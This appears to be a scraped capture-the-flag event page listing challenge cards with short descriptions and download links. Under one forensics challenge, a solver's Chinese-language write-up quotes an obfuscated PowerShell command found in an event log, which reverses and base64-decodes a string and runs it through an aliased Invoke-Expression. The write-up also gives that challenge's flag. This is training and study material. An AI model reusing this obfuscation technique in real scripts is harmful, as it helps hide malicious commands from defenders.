<p class="text-xl" style="color: rgb(218, 3, 119)"> WEB </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Mtib </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> You must be quick in order to catch the fish. Note: Please wait 2-3 minutes for the instance to start. Also, make sure to carefully read the instructions on the main page. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/phisher.zip/d/1t_nv0ekVInHgX_rpFOYyhPrO8maNzYsL/view?usp=sharing"> <p> phisher.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> PNGIPHY </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> WEB </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Mtib </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> I created this image sharing application. It's SUPER fast. But is it secure? Note: Please wait 5-6 minutes for the instance to start. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/pngiphy.zip/d/1MoTqyTIiQyJDwNKJWlcbSbGrbtQQZRQP/view?usp=sharing"> <p> pngiphy.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> REPTILE JAIL </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> MISC </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Hiumee </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Just a pyjail </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/reptile_jail.zip/d/1X02-FC1zAsWryeVqtg6Wwk2psbMevsKs/view?usp=sharing"> <p> reptile_jail.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> ROTATOR CUFFS </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> CRYPTO </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> hofill </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Are you ready to rotate your way to victory? </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/rotator-cuffs.zip/d/1EuU6AaBwU2ZLEwh8g9umkvhOscoG8bS5/view?usp=sharing"> <p> rotator-cuffs.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> RULES </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> MISC </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> WARMUP </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> hofill </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Read the rules! </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="None"> <p> None </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> SAFE_CONTENT </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> WEB </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> skyv3il </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Our site has been breached. Since then we restricted the ips we can get Nones from. This should reduce our attack surface since no external input gets into our app. Is it safe ? For the source code, go to /src.php </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="None"> <p> None </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> SAGIGRAM </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> WEB </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Sagi </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Worst model of them all. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="None"> <p> None </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> SANTA'S LITTLE HELPER </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> MISC </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Hiumee </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Santa doesn't have a lot of room left in his sleigh. Help him fit one more item </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/santas_little_helper.zip/d/1QnN3hpOiXwAZ7RxoiZwNitSbaDvvVfdm/view?usp=sharing"> <p> santas_little_helper.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> SECRET MESSAGE </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> MISC </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Hiumee </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Help us encrypt this message. You don't need to know it </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/secret_message.zip/d/1jR49jTBZzpETvIxD9xsgB5YqHujTmg-w/view?usp=sharing"> <p> secret_message.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> SIGNAL </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> REVERSE </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> tomadimitrie </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Can you catch the right signals for the flag? The flag length is 32 bytes (without the flag format). Flag format: TFCCTF{flag} </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/signal/d/1wAqIFAvvDdM6fB6gsW4nGUHTpdB7_OtN/view?usp=share_link"> <p> signal </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> SIGNATURE </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> MISC </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Mtib </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Can you bypass this state-of-the-art login system? Note: The instance setup takes a bit longer, please wait 2-3 minutes after you start it. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/signature.zip/d/1jW75hKJcL4nbzSxA_JvMBKimkcIP0AuR/view?usp=sharing"> <p> signature.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> SM WHAT_! </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> FORENSICS </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Plig </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> An attacker managed to gain foothold in our network, but we managed to capture the connection to our server. Analyze the Challenge.evtx and identify the tool used to connect, the service it connected to, its IP address, and the shared resources folder. Flag format: TFCCTF{tool_service_ip_share} Example: TFCCTF{ntlmrelayx_rdp_192.168.0.1_logs$} Note: The flag is in all lowercase (except for TFCCTF). </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched" style="color:#efe6dd"> TFCCTF{v1sual_b4s1c_a1nt_h4rd} </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/Challenge.evtx/d/1WcZYiDpRB7djPxjhkoo0rKl42LqSw3Wg/view?usp=drive_link"> <p> Challenge.evtx </p></a></div> </div> </div> </body> :::spoiler 找了很久都沒有想法 突然看到這個 logger 的分類  在找資料的時候也有看到 powershell 的 log，但是沒有看到就放棄了 結果突然發現有把他篩選出來  ```shell= $FBtFFDr8NXp5 = "=oQDiUGel5SYjF2YiASZslmR0V3TtASKpkiI90zZhFDbuJGc5MEZoVzQilnVIRWe5cUY6lTeMZTTINGMShUYigyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WocmbpJHdTRXZH5COGRVV6oTXn5Wak92YuVkL0hXZU5SblR3c5N1WoASayVVLgQ3clVXclJlYldVLlt2b25WS" ; $w9r4pBoZlnfIzH1keCtX = $FBtFFDr8NXp5.ToCharArray() ; [array]::Reverse($w9r4pBoZlnfIzH1keCtX) ; -join $w9r4pBoZlnfIzH1keCtX 2>&1> $null ; $SCr = [SyStem.TexT.encODINg]::uTF8.GeTsTrInG([SYSteM.coNVErT]::froMBaSe64STrinG("$w9r4pBoZlnfIzH1keCtX")) ; $uqR = "i"+"N"+"V"+"o"+"k"+"e"+"-"+"E"+"X"+"p"+"r"+"E"+"S"+"S"+"i"+"O"+"n" ; NEW-aLIaS -naME pWN -VaLuE $uqR -FORCe ; PWN $SCr ; .\caca.exe "VHEEVH}x3uwcnad6u3eac3pvaj6tf" ``` 總共有這5筆 執行 但會失敗 直接解密`VHEEVH}x3uwcnad6u3eac3pvaj6tf` 猜測是位移 丟 rot13 暴力破解得到 `[A-Z]+2 TFCCTF}v3sualyb6s3cya3ntyh6rd` 失敗 往下看發現還有 ASCII[!-~]+2 TFCCTF{v1sual_b4s1c_a1nt_h4rd `TFCCTF{v1sual_b4s1c_a1nt_h4rd}` ::: <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> SURFING </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> WEB </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> skyv3il </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> My friend wanted a site on which he could steal other people's photos. Can you break into it ? </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="None"> <p> None </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> VIRTUAL </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> PWN </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Luma </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> My teacher wanted me to create a game for the final school project. Hopefully l passed... Note: This is a sequel to the 'virtual-rev' challenge. Solving the previous one isn't required, but be sure to solve it afterwards :) </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/virtual.zip/d/1rPrhDXurBz3PVZE4tvXjETV2bmSgdaxg/view?usp=drive_link"> <p> virtual.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> VIRTUAL-REV </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> REVERSE </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Luma </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> I managed to break into a secret infrastructure, but it seems they use some weird language... Note: This is a prequel to the pwn challenge "virtual". Make sure you check it out after solving this :) </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/virtual-rev.zip/d/1l5jI2JLJRHwoqJ2V-UHbRmG_Idt384OM/view?usp=drive_link"> <p> virtual-rev.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> VSPM </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> PWN </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Luma </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> I got tired of remembering my passwords... Password managers are so useful! </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/vspm.zip/d/1vVhfII97x-lyQ8QEdTpLKomFBMPajBH1/view?usp=drive_link"> <p> vspm.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> X8 </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> REVERSE </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> tomadimitrie </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Who needs more than 8 bits anyway? </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/x8/d/1zSCEVbGHvaPGsTH-pHg63-MZBol1uSng/view?usp=share_link"> <p> x8 </p></a></div> </div> </div> </body>